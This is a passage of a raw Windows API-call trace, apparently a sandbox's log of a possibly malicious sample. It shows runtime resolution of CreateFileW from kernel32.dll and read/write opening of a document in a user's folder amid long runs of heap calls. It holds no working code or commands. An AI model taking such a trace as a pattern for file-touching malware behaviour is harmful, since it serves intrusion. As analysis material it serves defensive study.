wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0178.043] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0178.043] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0178.043] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0178.043] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0178.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0178.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0178.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0178.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0178.044] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0178.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0178.045] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0178.045] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0178.045] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0178.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0178.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0178.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd4b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0178.046] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\gvoasfhilqm4y.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0178.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0178.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0178.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0178.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0178.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0178.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0178.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0178.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0178.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0178.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0178.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0178.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0178.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0178.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0178.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0178.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0178.049] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0178.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0178.050] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0178.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0178.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0178.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0178.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0178.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0178.051] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.052] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 